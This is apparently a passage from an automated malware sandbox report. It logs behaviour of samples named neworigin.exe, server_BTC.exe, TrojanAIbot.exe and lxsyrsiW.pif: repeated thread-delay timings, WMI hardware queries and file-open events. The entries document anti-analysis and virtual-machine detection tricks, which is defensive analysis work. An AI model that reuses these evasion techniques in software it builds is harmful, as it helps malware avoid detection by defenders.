                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99623s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99071s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98873s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98547s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98437s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98327s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 5656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2136Thread sleep count: 5417 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3200Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2136Thread sleep count: 674 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 2788Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5932Thread sleep time: -299340000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5932Thread sleep time: -287880000s >= -30000s
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 6672Thread sleep count: 37 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -12912720851596678s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 828Thread sleep count: 524 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -99872s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 828Thread sleep count: 2214 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -99757s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -99632s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -99510s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -99408s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -99283s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -99158s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -99033s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -98899s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -98791s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -98669s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -98559s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -98452s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -98337s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -98228s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -98106s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -97941s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -97242s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -97109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -96977s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -96797s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168Thread sleep time: -96593s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 3040Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -27670116110564310s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -99760s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -99030s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98867s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98749s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98630s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98494s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98381s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98243s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98132s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98009s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97850s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97739s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97602s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97483s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97364s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97227s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97115s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -96987s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -96852s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -96690s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -96462s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -96352s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -96243s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -96133s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -96024s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -95914s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -95801s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -95680s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -95571s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -95458s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -95337s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -99953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -99844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -99734s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -99625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -99515s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -99406s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -99297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -99187s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -99078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98969s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98511s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98406s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -98062s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97843s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97734s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97624s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97516s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97391s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052Thread sleep time: -97281s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 2216Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 2792Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EC5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02EC5908
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99848Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99723Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99602Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99493Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99378Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99257Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99138Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99026Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98869Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98766Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98641Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98208Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98066Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97860Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97666Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97538Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97427Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97302Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97183Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97066Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96934Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96809Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96701Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96590Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96478Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96357Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96247Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96103Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95994Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95870Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95423Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95278Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95168Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95046Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94892Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94763Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94654Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94544Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94435Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94326Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94216Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94106Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93992Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93884Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93778Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93669Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99953Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99843Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99734Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99623Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99071Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98873Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98765Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98656Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98547Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98437Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98327Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99872
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99757
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99632
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99510
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99408
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99283
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99158
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99033
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98899
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98791
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98669
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98559
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98452
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98337
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98228
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98106
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97941
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97242
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97109
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96977
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96797
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96593
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99760
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99030
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98867
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98749
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98630
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98494
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98381
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98243
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98132
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98009
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97850
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97739
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97602
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97483
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97364
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97227
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97115
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96987
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96852
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96690
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96462
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96352
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96243
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96133
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96024
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95914
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95801
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95680
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95571
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95458
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95337
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99953
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99844
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99734
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99625
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99515
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99406
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99297
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99187
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99078
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98969
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98625
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98511
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98406
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98297
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98172
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98062
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97953
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97843
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97734
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97624
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97516
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97391
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97281
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: x.exe, 00000000.00000002.2184605014.0000000000866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWFC3z
